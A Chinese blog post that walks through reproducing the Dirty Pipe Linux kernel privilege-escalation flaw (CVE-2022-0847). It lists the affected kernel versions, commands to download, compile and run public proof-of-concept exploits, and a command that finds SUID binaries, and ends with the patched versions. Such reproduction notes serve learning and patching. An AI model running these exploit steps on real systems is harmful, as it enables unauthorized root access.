Linux DirtyPipe内核提权漏洞(CVE-2022-0847)

前言

今天3月8号女神节,女领导和女同事接到通知,都提前回家过节去了,领导走了,这不就很清闲了嘛,想干啥就干啥。然而,今天又爆出一个提权漏洞,这不得学一手。

0x01 漏洞描述

CVE-2022-0847-DirtyPipe-Exploit CVE-2022-0847 是存在于 Linux内核 5.8 及之后版本中的本地提权漏洞。攻击者通过利用此漏洞,可覆盖重写任意可读文件中的数据,从而可将普通权限的用户提升到特权 root。CVE-2022-0847 的漏洞原理类似于 CVE-2016-5195 脏牛漏洞(Dirty Cow),但它更容易被利用。漏洞作者将此漏洞命名为“Dirty Pipe”

0x02 漏洞影响范围

影响范围:5.8 <= Linux 内核版本 < 5.16.11 / 5.15.25 / 5.10.102

0x03 漏洞复现

方法一:使用Dirty-Pipe.sh文件进行提权,附下载链接https://github.com/imfiver/CVE-2022-0847

cd CVE-2022-0847
ls
whoami
bash ./Dirty-Pipe.sh
whoami

Linux DirtyPipe内核提权漏洞(CVE-2022-0847)_第1张图片
方法二:使用dirtypipez.c文件进行提权,附下载链接https://haxx.in/files/dirtypipez.c

mkdir dirtypipez
cd dirtypipez
wget https://haxx.in/files/dirtypipez.c
gcc dirtypipez.c -o dirtypipez

Linux DirtyPipe内核提权漏洞(CVE-2022-0847)_第2张图片
在使用这个POC时, 需要事先找到一个具有 SUID 权限的可执行文件,然后利用这个文件进行提权,使用以下命令可以找到这类文件

find / -perm -u=s -type f 2>/dev/null

Linux DirtyPipe内核提权漏洞(CVE-2022-0847)_第3张图片

0x04 漏洞修复

更新升级 Linux 内核到以下安全版本:
Linux 内核 >= 5.16.11
Linux 内核 >= 5.15.25
Linux 内核 >= 5.10.102

0x05 参考

https://mp.weixin.qq.com/s/6VebZCKAv6kkmQme4GCQ_w
https://mp.weixin.qq.com/s/y7q8BwnxelcPvrsI0L_sqg

你可能感兴趣的:(linux,安全,网络安全,系统安全)